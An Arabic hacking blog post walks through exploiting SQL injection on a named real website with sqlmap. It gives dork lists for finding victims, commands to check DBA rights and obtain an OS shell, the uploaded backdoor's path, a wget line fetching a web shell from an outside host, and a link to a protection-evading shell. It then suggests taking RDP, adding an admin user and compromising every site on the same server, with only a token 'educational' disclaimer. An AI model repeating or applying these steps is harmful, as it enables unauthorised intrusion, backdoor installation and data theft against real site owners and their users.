16922060824144624
recent
أخبار ساخنة

شرح رفع الشل من ادات sqlmap مباشرة

الخط


السلام عليكم و رحمة الله و بركاته 

في الكثير من الاحيان نقوم ب استغلال ثغرة الحقن sql على الكثير من المواقع و دائما ما يواجه المبتدئون صعوبة في ايجاد لوحة التحكم او حتى ان وجدها فانه ربما لا يعرف كيف يتخطى الحماية و يقوم ب رفع ملف ضار شل (PHP) مثلا او ASP او ايا كان 
لهادا ساقدم لكم اليوم الشرح المفصل لرفع الشل مباشرة من ادات SQLMAP طبعا ليس شرطا ب ادات SQLAMP تستطيع ان تقوم بها عبر الطريقة اليدوية  في حال وجود حماية مثلا WFA 
الان سوف نمر الى شرحنا 

في البداية اريد ان اقدم لكم مجموعة من الدوركات للبحث على مواقع مصابة المواقع المصابة بهده الثغرة في الاغلب تكون على سيرفرات الوندوز  لهادا انصحكم ب البحث بهده الدوركات لانني انا شخصيا وجدت الكثير من المواقع المصابة بهده الثغرة 


و هده قائمة ب اكثر من 4000 دورك للبحث على الثغرة 

رابط الدوركات اضغط هنا 


وهده قائمة اخرى من دوركات للبحث على مواقع مصابة و لكن مبرمجة بلغة asp و انشاء الله مضمونة 

رابط الدوركات اضغط هنا 



و الان بعد ان وجدنا احد المواقع المصابة ب الثغرة  سوف نشرح كيف تتم عملية الحقن  
الاصابة 


http://www.lzyts.com/routes/tours.php?s=1016


الان سوف ننفد هدهالاوامر على هادا الموقع عير ادات sqlmap  

الامر الاول   
sqlmap -u 'http://www.lzyts.com/routes/tours.php?s=1016' --batch



و هادا الامر لحقن الموقع مع تخطي جميع الخيارات (الحقن السريع

و الان بعد الانتهاء من الحقن اعطى لنا هده النتائج كما نشاهد في الصورة 





سوف نقوم الان هده المعلومات  هده المعلومات


web server operating system: Windows 2008 R2 or  7  <<1 font="">

نضام التشغيل وندوز 2008 r2 او وندوز 7 (لم تستطع الادات تحديد نضام التشغيل ب كفائة )
و يمكن معرفة نضام التشغيل عبر ادات nmap التي سبق و شرحتها 

للمرور الى الشرح اضغط هنا  




2 >> web application technology: Microsoft IIS 7.5, PHP 5.5.15, ASP.NET


لغات البرمجة المستخدمة في السيرفر   Microsoft IIS 7.5 و PHP 5.5.15 و  ASP.NET



3 >> back-end DBMS: MySQL 5


نوع قاعدة البيانات MySQL الاصدار


و الان سوف نقوم بتنفيد هادا الامر 


sqlmap -u 'http://www.lzyts.com/routes/tours.php?s=1016' --current-user --is-dba

لمعرفة الصلحيات على السيرفر 

الان سوف نرى في الصورة ما هي صلحياتنا 





كما نرى في الصورة ف انا صلاحياتنا في السيرفر هي ROOT  و من هنا يمكننا التحكم في جميع قواعد البينات التي في السيرفر

لم تفهم !! 
على سبيل المثال يوجد في السيرفر  10 مواقع و لكل موقع قاعدة بينات و من هنا يمكننا الدخول لاي قاعدة بينات لاي موقع نريد  :) 

الان اعتقد انك فهمت 

الان كيف سوف نرفع شل على الموقع 

الامر 


 sqlmap -u 'http://www.lzyts.com/routes/tours.php?s=1016' --os-shell

نتيجة الامر كما نشاهد في الصورة 





و الان عليك ان تختار بعناية ادا كان السيرفر يدعم لغة php ف عليك ان تختار php  و ان كان يدعم asp اخترها الخ 


بعد ما اخترت انا php لان السيرفر يدعم لغة PHP ضهرت لي هده النتيجة 




هنا الادات تريد منا تحديد مكان رفع الشل  


[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)

رفع الشل في  المسار الدي تختاره الادات 

[2] custom location(s)

المسار الدي تختاره انت 

[3] custom directory list file

قائمة للتخمين على مسار في السيرفر و رفع الشل فيه على شرط وجودصلحيات 


[4] brute force search

القيام بعملية تخمين  على المسار ب المسارات الموجودة في الادات مسبقا فيه تحتوي على الكثير من المسارات للتخمين 

انا شخصيا جربت كل شيء و لم انجح و كنت سوف اترك السيرفر و لكن وردتني فكرة انا السيرفر الدي اخترقته كان سيرفر وندوز 

وسيرفرات الوندوز تعطيك احد الاخطاء  بدل INDEX OF 

على سبيل المثال لو دخلنا الى هادا المسار لنرى ما هو الخطء الدي اتكلم عليه 

http://www.lzyts.com/images/

هدا هو الخطء الدي ضهر معي 



كما نلاحض في الصفحة مسارنا في السيرفر 


D:\www\lzyts\images\


لهادا هده الثغرة سهلة الاستغلال في سيرفرات الوندوز اما في سيرفرات لينوكس سوف تواجه الكثير من المشاكل و لكن ان شاء الله في طرق للتخطي سوف اشرحها في هده المدونة المتواضعة  
الان نختار الخيار 2 في sqlmap 



و الان بعد انتهاء الحقن سوف نرى مع  بعض نتيجة الحقن في هده الصورة 






كما نلاحض قد تم رفع مركز رفع مع هده الرسالة  مع رابطه 


the backdoor has been successfully uploaded on '/www/lzyts/images/' - http://www.lzyts.com:80/images/tmpbjaml.php

اي ان الرفع قد تم و اعطى لنا جلسة شل  في السيرفر يمكن تطبيق اوامر الوندوز عليه مثلا لمعرفة ايبي السيرفر ننفد هادا الامر  ipconfig




  
و الان يمكنا التنقل في السيرفر  و رفع الشل الخاص بنا عبر الامر 



wget http://www.site.com/shell.txt -o shell.php

و الان ندخل الى مسار مركز الرفع 

 http://www.lzyts.com:80/images/tmpbjaml.php





كما نرى قد تم رفع مركز رفع و الان سوف نقوم ب رفع شل aspx 
و لكن ليس اي شل بل شل يتخطى الحمايات 
و يمكنك تحميله عبر هادا الرابط  

http://cut-urls.com/mGbEZ


و الان كما نلاحض في هده الصورة بعد رفع الشل 






و الان يمكننا سحب rdp و اختراق جميع المواقع التي في نفس السيرفر عبر اضافة ادمن جديد في السيرفر او سحب اليوزر و الباس الخاصة ب الادمن في هادا السيرفر 


في النهاية هادا الشرح تعليمي ليس الا و اتمنى ان نكون في حسن نيتكم ولا تنسو دعم هده المدونة 

و الان لمشاهدة فيديو لطريقة الاستغلال 



إرسال تعليق

نموذج الاتصال
الاسمبريد إلكترونيرسالة

يا رب تروح للجنة إشترك في قناتي